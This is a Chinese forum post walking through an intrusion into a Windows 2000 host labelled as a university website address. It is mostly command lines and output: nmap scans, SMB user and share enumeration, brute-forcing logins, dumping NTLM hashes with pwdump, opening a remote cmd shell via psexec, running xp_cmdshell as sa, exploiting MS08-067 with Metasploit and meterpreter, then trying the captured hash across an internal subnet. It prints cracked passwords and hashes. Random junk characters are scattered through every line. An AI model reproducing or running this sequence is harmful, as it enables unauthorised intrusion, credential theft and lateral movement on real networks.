广西师范网站http://202.103.242.241/( @) [) ^1 j. } \& `/ S: r; l
7 A1 B" ?) [* l& d' f' h* Oroot@bt:~# nmap -sS -sV 202.103.242.241
. w$ m' s2 a% u5 }" a# o3 o
3 m# ~) e" P- t3 g1 B1 q) ?7 F* `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST7 y r1 o& e9 @1 |( T. e9 J; g4 m
1 Q8 W6 @% a( `/ P
Nmap scan report for bogon (202.103.242.241). J4 K' S) {6 F3 E2 X) q P2 D
& k8 B* P4 p: C$ \
Host is up (0.00048s latency).
W9 s: b$ u0 y+ X: w3 x2 }' W% X1 T% T" k9 i- n6 m, `
Not shown: 993 closed ports+ \2 [8 o' U+ Z& G, j8 {! I
) {3 g. V. }) p# Q: I( f
PORT STATE SERVICE VERSION
# J) X G2 O9 j- T+ @9 U' o, G$ R
% W2 @1 m" t& \" D! p5 _135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
+ T9 h4 m4 D/ v5 ]8 \
3 N) A# z* u7 \# ?139/tcp open netbios-ssn T. k# [% A( i! l) y$ d) ~" d$ U, D
: \/ Z4 G4 T/ U5 V
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
* r2 ?7 _) T3 n* H/ a O/ l# j" `& Y% J5 s! R1 K! G
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
/ ~" d$ Z+ w: T( z1 l) s
1 Q# i# y3 i. [- N* r" @1026/tcp open msrpc Microsoft Windows RPC9 k$ M5 y* C) u- E5 O/ m7 d, y
$ G3 E. G; m: U. E4 e3372/tcp open msdtc?! \, g* ^7 S* i% G+ W7 O* w
- I1 m; G1 i' Q) F$ l6 k+ K
3389/tcp open ms-term-serv?
. a* d% {0 B4 j7 Y& M
& |4 R1 V7 P9 m0 I/ U! k$ S1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :; P1 |# o$ N& M3 w5 I4 e! P) @
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
2 z! P: u! O F$ \. a) p8 m6 p3 u; L9 e r1 ^9 X" _
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions' M$ H# N3 n' V6 N. B
+ n* Z- i/ u2 E( SSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)$ P% |9 m) R: y( y5 {3 Y
: c' u! N' S& \( Q, f* oSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
8 }6 V1 k7 n+ ]0 |, O3 f
# i; s. k( M4 j$ XSF:ptions,6,”hO\n\x000Z”);
: W H: O6 e: Y0 Q
4 o$ b/ q& `' {1 |* Z, G8 W( L2 sMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)* }& X# F& J% L6 O+ _) G F
. ]) b0 p; R; [3 E/ P, p B- d8 sService Info: OS: Windows! n* t1 t' @$ s! s' Z
# V& m; t6 n0 L* `. kService detection performed. Please report any incorrect results at http://nmap.org/submit/ ." A- y+ H. `$ c: `* D
' g! ^+ x5 t# A Z" a& q
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds! J* Y* H+ Y" h5 c
& O A% G# l/ R$ S" p- ?# {
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本; P7 n% J$ w* }5 n0 H( k4 |
/ }( I" t* \! h! I( l, h. ^& E
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse! U3 X! J! n! w5 X( Q; @
+ O/ |8 h7 C5 f
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
5 d/ p8 A4 I$ O# m5 S0 R! p) ~2 Q/ M6 n* [/ y* ^' l K
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
8 u- Y3 t0 }1 [2 N; A. o
* u8 u6 S' U! o' r+ ^-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse: N' k2 y1 ~. n
/ Z# Q, U! ]+ |! Q D" y- J
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
; V6 D) G2 f D6 |& V, d5 H! F/ d& q1 Q- [ v
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse* [+ |, ?/ g5 o) M5 T$ B
' h) j# p& u0 d6 P) W. x% X-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
9 z2 ]( c' l$ y. j4 \1 h7 }" F& ]4 U, \0 t2 q
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse3 W7 M3 r7 A7 T/ \- @* t- L) l
! a. e, C; F; S9 D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
4 @! x, T- U3 r0 N, U" F9 V
- ]# U1 A$ t5 i- {" U' ~/ `4 Q-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
+ n" K- G6 j! I* G% e6 P. o# y, z3 {0 c
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
J7 e! F9 ] D! i$ C0 E
1 w" `; W; w5 [; k, A5 e8 i2 t-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse& J: ~- Y2 }7 q* g7 v
, s L' z1 b& `3 K, s0 I; o9 q- I-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse' H% N! R7 R2 T. @; I* k
8 `( t- _" H. a& c5 n3 n8 L4 U. Q-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
' }' Y) v6 a" X: m; I, ]1 Y% m" S8 W3 ?! R, Q2 i
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse# H& V' x1 i7 |" {8 J
) a* p5 B |* \* m% r1 x( N0 @! B) F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
% y p8 ~) `& B& Q( Q/ @3 ?: B3 x1 v; x7 s& Q; p O
//此乃使用脚本扫描远程机器所存在的账户名+ b: R/ o0 T2 T. W5 R$ k; x( W( ]1 v
% W4 l" q/ l4 w' C$ P. z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST9 Z- B( I( [2 m4 U$ \# j8 @& }
) E. |& Q& Z2 y# L2 V* D8 Y. fNmap scan report for bogon (202.103.242.241)
& O8 J% s# L0 b5 N
8 ?% W( S! m# A# BHost is up (0.00038s latency)., b( T3 i1 [0 H: ^2 G e- d
$ I. Z& o4 O K1 w% h% `Not shown: 993 closed ports6 ]: M- w' q" _ J4 d+ `
8 L/ w" Q7 ?+ [1 ^% x
PORT STATE SERVICE7 {0 c3 j5 I0 D
2 Y) q" Q, \5 I, S r135/tcp open msrpc3 r; _) x! m! D0 J/ D$ v7 R
3 v; T, ]9 d$ H/ m! w% T- Z5 s
139/tcp open netbios-ssn
. [& `* H( a4 G- r$ w% _: b# |9 X
( z4 S8 s/ _: Q/ T445/tcp open microsoft-ds
, F3 R N, {6 J
3 |7 I: ?2 d! F9 {1025/tcp open NFS-or-IIS* [ A" w! x! k, E1 b
4 Y: [, s6 o; x3 y0 N# D; M
1026/tcp open LSA-or-nterm
3 x1 D& L8 o1 r" U7 a4 t5 N% W8 Q5 ~' b; Z9 k
3372/tcp open msdtc
& a# d0 h6 P+ i7 w/ f+ [" S. b+ [. @, K
3389/tcp open ms-term-serv7 |8 D c& x, f# p. o9 u
5 }0 _' T% }( y6 v2 L+ E5 qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 q8 N/ e. e. E* k7 _
( g; L* x/ \; L& \( H/ nHost script results:
1 l4 w0 f4 z3 t& N3 F$ j+ F0 c2 C- {3 }' J8 v* G, r2 ]5 g5 P
| smb-enum-users:3 q c5 E& H1 g0 d% b* L
% X9 d* P+ M4 Y6 j|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
. u+ W) z5 M1 O* X" l1 A* m: `4 G0 ~" J- F$ a) I! r% y
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds/ M( y( |% w. I7 ?
# N$ z, {, U$ W& \# o/ U: U i: jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 $ _, l! B+ F7 W+ u
_, v' V+ E% A3 w* E2 m
//查看共享
0 A. f: C9 d8 B+ V! \3 M. g4 g1 V, s0 l6 J
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
* y2 W& a2 E* f9 m) h# {0 H
4 _$ R" p0 c) @Nmap scan report for bogon (202.103.242.241)1 f$ N1 u. l; B) z! q) R
9 \3 J1 ~& R* `' y( x. qHost is up (0.00035s latency).! G" ]- @& i& n9 F. O+ w4 a
5 M+ U* s+ ?/ F6 B0 bNot shown: 993 closed ports4 u8 \% q U3 K0 t
, M; J |" F. }
PORT STATE SERVICE
$ k- {1 H' B' C9 x4 F- F: M2 L5 B5 y7 z/ w" _: O6 w6 ~9 R0 x) s
135/tcp open msrpc# K4 K& u' c8 A8 G1 `- W6 q3 R3 f
" V+ i( @( g3 y- d/ Y S
139/tcp open netbios-ssn
2 g. n. b$ o/ h, @" h4 A& V0 t: {3 B0 Q8 v2 D
445/tcp open microsoft-ds7 N- z! ?& Q1 Z
, S8 B: r7 E$ Y7 h$ R) }: N1025/tcp open NFS-or-IIS
! u( O2 T7 U7 I( ]5 ~; F3 [) c& ~2 r# v6 Q
1026/tcp open LSA-or-nterm2 u% k: ]& [1 |" d9 _/ y0 e
. b) m5 `3 o/ \& v
3372/tcp open msdtc
( r5 D3 K5 @5 t0 Z0 Z/ p* Q& s7 @. L U! S1 p+ }" N6 T; i
3389/tcp open ms-term-serv
) N; @' i O( C9 j( b- j
1 a5 q7 `# {9 m, b KMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 v7 | ^8 O$ b; I0 G# F6 D% Y
( @4 A [ B JHost script results:5 }9 |% `& [. e6 M) p2 k$ h
$ f/ o7 M! J( A2 A| smb-enum-shares:
p! }2 }+ e6 _
5 r. v3 l" }# W+ r4 Y| ADMIN$& [/ ?( ], j3 o) }' U: x9 g6 K# ~
S& F" F `9 u/ S: r) |4 f
| Anonymous access: <none>6 x; S9 I7 o& q+ I) E/ r, t8 n
0 u2 U0 s. E9 @! V
| C$# x- ~4 w9 {5 `, }5 I7 A
$ J% [; b/ L. H5 ]- b
| Anonymous access: <none>" w( i* f+ V. I/ {0 C3 \/ Q7 D b
; w7 X- _- d! w: n2 k
| IPC$4 Z+ R6 j- u' g
) z, h# n7 N' t: S5 s9 l|_ Anonymous access: READ
+ Z& I: f* Y/ _) K! P1 `
; E. T0 G4 p, T) rNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
( \$ K2 T% }5 L& Y6 d6 N) t( h$ ]$ {! O$ b4 m; c: F9 T: z# {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 9 l8 F! g4 o+ p. q6 ~
3 G7 a1 Z5 P, a0 `* |& ^2 a//获取用户密码6 w: y4 h- d( V8 N* {
. s5 [; v H2 D6 @" \, N+ }0 T! qStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
7 d6 _) Y) D& l) j+ h' m3 [5 j$ K2 {0 y& g
Nmap scan report for bogon (202.103.242.2418)2 Q0 I2 ?, M7 Z( J8 S, b1 R Y
8 r; ~0 Z( e9 p, L- y* ]: C
Host is up (0.00041s latency).2 J7 w5 S$ a! ~( E: V) Y
( f% D: a8 L6 G- g7 CNot shown: 993 closed ports
7 Y* J0 {/ z7 s% x
. Q8 ^: J y# P% V- E; g$ kPORT STATE SERVICE
0 x$ G; ^* }8 @7 f
. u' |1 e9 b2 L- B: c/ \0 v135/tcp open msrpc
) B: T0 Q# t& S+ v8 e$ v4 s5 K0 q
139/tcp open netbios-ssn7 a6 V) n: U3 e j* I2 X
( b" F% S% W% ]% u
445/tcp open microsoft-ds/ d8 V; ~+ M5 o
' Y% D6 @0 D% R+ i
1025/tcp open NFS-or-IIS' ~ |' S+ o6 [$ _
2 z( W( N. V& Z+ z) O I9 B
1026/tcp open LSA-or-nterm
" y( ]; w7 x! c5 s3 i f5 u
9 t6 {7 S- l+ j6 V' a- S4 X3372/tcp open msdtc
3 N! x/ ^- r( e; R+ @: g1 J* ~
3389/tcp open ms-term-serv( A. T! z& [9 Q/ i' ~: i! g
, V, A4 }7 C* _2 g8 V& i* d
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 I$ |( F: L7 n& o# l/ V, u- X3 z; J
0 S' X! h/ ?' A! AHost script results:
' u* e" b$ h) x l- z) A3 Y R: u4 |" r* R) W- p: a; {8 x
| smb-brute:
. h/ f5 |6 k, d, x( a* m# d
, k5 n9 O, q0 M# `! z8 z6 A4 H( \* uadministrator:<blank> => Login was successful' m/ o2 d$ F7 b- y/ C( c* p) ~
$ C! o% H- F: T; \* G7 X. M3 D2 s|_ test:123456 => Login was successful
( ?$ L# S2 v5 L, y7 W
. Z7 p& c5 X C4 y9 _" UNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
2 ~, A8 F% V$ u. X5 A* X
7 S% f3 f5 v/ I croot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash. x' z$ N9 O5 [1 f9 [4 S( n, m7 Z
, _1 x: h, m. Proot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data$ T- O4 P2 x/ @) z" l: ~( u" B1 [
! y. T% y% }6 croot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
2 ^7 s& h- ?, Y1 ]; Z5 Z3 A, l
1 u6 a U d$ Q% _2 f6 d/ ?root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139/ L) Z" F/ E7 S+ v
4 Y0 k8 X U; g+ E$ ^/ A1 aStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST c# c& Z7 ]7 h- I+ d0 H" d) a
+ v: m. U( z- F/ U, i1 C: E" N% lNmap scan report for bogon (202.103.242.241)
5 q8 q/ Y$ w0 @0 n, [" x
4 c$ Q7 l8 [) pHost is up (0.0012s latency).; P/ y0 M6 |- x Z4 _ m
4 r8 R$ K% d# V4 s8 \4 A7 A
PORT STATE SERVICE( u, ]0 c5 E) }% L
- f% Q! ^- \8 `1 D# a5 R6 o
135/tcp open msrpc
) Y8 N s2 H; q- P0 b! f0 l& n( w* {6 J7 U# J
139/tcp open netbios-ssn
+ R0 T, p5 J# i9 ~( S! h' V6 h! R
3 c' k$ F) [; I5 U445/tcp open microsoft-ds
' `2 V, h( E7 |
4 V4 n( B1 W, F( K1 IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- O8 l2 T2 K* w6 U: w
. |/ j x. B+ tHost script results:
& C1 h8 r' L( l+ b7 n
P# g) ?" a5 e| smb-pwdump:, l% C# L$ S: r2 G. W0 ]
7 m" w1 \; q$ f; O
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
6 p) D2 c! H* ?, [% Q" _' e' ]6 g: E% L! V' I$ z0 n p
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************4 t+ v% q& l( p
/ v; Z1 n* J ] I4 R: [# {+ ^$ r| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4' Q0 v0 {$ M- j9 M
4 a1 W! Q7 d, m) i|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 ~0 e# R0 ^1 }# f5 [( p
2 r% y( E7 {6 oNmap done: 1 IP address (1 host up) scanned in 1.85 seconds9 V& r9 O# X$ C! U ^
) T$ \& N, F( ?* }; }+ z, F2 ~
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell6 m7 b/ M2 W1 k& K/ T3 Q# @
, w1 ^. H+ M% G, c* e-p 123456 -e cmd.exe
) i, M' m+ D: w
0 F( R/ `. j( [# e+ }PsExec v1.55 – Execute processes remotely
: H! e8 K2 g' l/ k3 g! I" Q3 D
8 \2 g( h! D7 n3 O7 iCopyright (C) 2001-2004 Mark Russinovich. t% n; K$ y" ^1 ]; c- H
( N z+ {: y9 D5 |( e" R* R* ^
Sysinternals – www.sysinternals.com! P) T" `2 i. y* i3 ?- K
F& o8 V/ F' ?5 Y! z" B
Microsoft Windows 2000 [Version 5.00.2195]
- E; k9 G" F; J$ ]; @% P$ q9 m
3 Q8 y5 d# x- l(C) 版权所有 1985-2000 Microsoft Corp.
7 {/ H- h# y6 T" ]6 I4 b# A/ v) l
1 ]- {* |( q7 v1 }C:\WINNT\system32>ipconfig5 h, t, E2 \ s3 V/ r4 G
7 N. B2 P- j# n' n3 h) T: P3 Z
Windows 2000 IP Configuration4 s) V+ ^: S7 O
( F! q9 r. g) YEthernet adapter 本地连接:
) _* @: m9 N* c1 E* d b% Y9 w% v3 S1 \1 \
Connection-specific DNS Suffix . :/ R/ C, G1 ]# N2 C C# E
! Q2 p c. X w8 X! K2 S* W
IP Address. . . . . . . . . . . . : 202.103.242.241* h" S( G' g( G! P* ^
" a2 N( q1 v- a/ o
Subnet Mask . . . . . . . . . . . : 255.255.255.0
- v! q% p5 s, r: {/ d( e
$ ]) T, j# W7 TDefault Gateway . . . . . . . . . : 202.103.1.1; [, F! @. T9 k. z
* I, W4 @- v+ G N- `
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
) e" j/ v) c* Y7 B, W/ o7 N8 {" Z
% M; a' V# a! x k( Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
* }; j: P n# i& _, f" }- \: i: B5 ]! L* P1 b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST$ Z( b) W5 Z' y. D; W
( G& Y; R1 w# f& g' n2 ^" _
Nmap scan report for bogon (202.103.242.241)/ g% V: F+ K: G% y% K
' x2 w" I! x4 a: |5 gHost is up (0.00046s latency).3 a6 x! U4 r+ M
. j9 d' D/ T" n% [+ `
Not shown: 993 closed ports
' i, u; p% L' e" L6 h5 q# q$ m, ?; M1 f% }; m1 Q! H
PORT STATE SERVICE
7 a4 q, _* n a& c- X2 y
1 j* j! l0 g F. q' A) {135/tcp open msrpc8 r) E" e: E2 G4 K0 h
# Y0 }8 ]1 y4 A: j139/tcp open netbios-ssn" G& q7 t8 \4 Q+ R) f, }$ a# G: `3 f
9 P# p5 T! X, i m
445/tcp open microsoft-ds, r4 e+ G* l( m c
+ J% f& |- l% B1025/tcp open NFS-or-IIS7 J# _9 M: f0 r- [
4 h4 K) {9 `9 F3 R) T1026/tcp open LSA-or-nterm
. _+ M; P2 \. R2 u# y4 B- |/ D* [ ]" q [
3372/tcp open msdtc' S Q/ |1 ?- O* q2 |! q1 _) d- R2 z
0 u. i8 h1 E; x/ B) K8 Y3389/tcp open ms-term-serv' W4 _% ~, S% Q
( y0 |/ J; w8 b& Q9 k# VMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 ~6 i) Z3 O) R {8 v
/ V# n0 E# |3 z+ q; ~$ W" hHost script results:' ?1 k2 A: E& Z. B
5 T) ]/ y8 D3 J8 F( D' Y
| smb-check-vulns:
7 \ Y/ o. a; L7 k1 _+ T/ G. W7 j: f% k; H3 t( g: |. x
|_ MS08-067: VULNERABLE
2 {* y$ D% p' H) h# V b6 [
* [9 \8 r, |" v, I3 Q1 NNmap done: 1 IP address (1 host up) scanned in 1.43 seconds3 a5 M3 g u- r% g3 z
& H7 t: U* a6 f/ g1 n$ G: j- E1 ^
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
+ C. E- u" i" ~/ Q n/ P% y; D
9 W* e8 d' D: ]" Q" jmsf > search ms08) I: X, J, v L
8 c8 k- |# t. I1 |8 Umsf > use exploit/windows/smb/ms08_067_netapi o! \, u1 S$ `( }
9 E) V) f7 o; J; E x
msf exploit(ms08_067_netapi) > show options: ~/ L" D8 T7 b4 z
; b4 Y o" O3 H' q! T+ C& \
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
- H n- B" J% Z2 J
# q o% r4 {3 j% w9 l% Hmsf exploit(ms08_067_netapi) > show payloads5 }# I0 E+ u$ h6 O# x/ H- _. O" L* ^& N
9 L2 _& g, E# r5 q1 ^1 W" D% O7 G
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
. H4 n9 }1 h8 o- ?+ y
9 N$ d* c+ l D5 H0 A$ p7 ~ Kmsf exploit(ms08_067_netapi) > exploit
" ~8 q! E5 U8 G8 A# S' } f) I" U; Z7 S# g9 y' y" f. o) g' g& T
meterpreter >* t' L3 L, p1 R' T
1 y. G; R |) r; Z0 l, n6 n7 y0 o
Background session 2? [y/N] (ctrl+z)
0 H n- ?" ~6 l" {* _: F
3 B, R% J* q1 V) Nmsf exploit(ms08_067_netapi) > sessions -l
4 e' @2 Q% E/ g
- Z1 [7 E. |+ h1 z' h# ]! H2 vroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
b% w& Q$ J# T" a& p! H/ |: q. j) R9 `% o! o6 R3 }
test3 W J$ ^1 @! ? j; u
' e2 I7 w' ^" X4 ~9 }: Radministrator
& t% @/ U# V2 D) ~& c& ^+ Q$ d& ~5 z+ r( i2 C) m) {
root@bt:/usr/local/share/nmap/scripts# vim password.txt
: f2 d/ m: i1 ^9 c' @* [# Q
# ], k9 ]+ {/ `* m44EFCE164AB921CAAAD3B435B51404EE
$ W. @! p5 `5 L* Y3 L) x4 j0 v& d
. L; i4 N2 F5 M1 w1 |root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 7 V. ?* R# s: D$ l! f, s
) J8 T p! C7 n" W+ ~: k //利用用户名跟获取的hash尝试对整段内网进行登录: ]/ j! k# ]+ ?
: S" G" X; z) O
Nmap scan report for 192.168.1.105- M8 E# h2 Z$ i- }# z) J# W: B9 a
+ i8 ~. }) Q% N6 s" g
Host is up (0.00088s latency).# h- f" S2 W& x! k V) y
6 L. y# {( n. Z. F: V
Not shown: 993 closed ports
. t$ g8 H8 Q1 p }- w9 t) t, x
/ R' B' ?4 K! ~' NPORT STATE SERVICE5 X% {$ v1 x. f. q4 N
, s0 o1 `9 O: P! K/ U135/tcp open msrpc- F5 {2 Z; f( R" D- Q
" Z6 C$ u2 E- Q ~+ ~+ S139/tcp open netbios-ssn O. Y5 L! i1 ]3 D! }0 u. j
7 i9 F; ]0 G( B" i5 p( l2 k0 P445/tcp open microsoft-ds
3 Q) x2 m& w6 g' K9 u5 o4 C' O% k2 j; h
1025/tcp open NFS-or-IIS1 b& d4 y! e$ {3 v( k$ y2 Q
, T! f2 Z1 |$ h9 t6 I# g8 Z, |1 T2 s1026/tcp open LSA-or-nterm( e o% G' q9 w9 a* p
$ N2 n8 E$ B, d9 y! b# n6 h5 Z3372/tcp open msdtc
7 z* Y3 F# [9 f$ a. E2 [% J, [) G1 S' l. S4 I: ~
3389/tcp open ms-term-serv
! D+ T8 l+ v$ k& I0 a4 |6 w; x: j3 l# x$ V! [
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, B1 k, a3 N" F5 i* h2 N6 N" ^$ H* D' @) {3 {
Host script results:
* Y' Y% k0 _. ^0 y% g, d4 g/ ?0 v( D8 z7 u. W
| smb-brute:
3 y% t; J( Y8 P# g
5 P4 n+ f, h6 J V$ ~|_ administrator:<blank> => Login was successful
! d. {% h0 z2 H8 H" o8 W; s z% n3 i; \" y( R2 e3 ]
攻击成功,一个简单的msf+nmap攻击~~·4 X+ D, h$ Z( G; P5 V
6 _4 y& j# A B8 s0 \0 F% R |
发表于 2012-12-4 12:46:42
收藏
支持
反对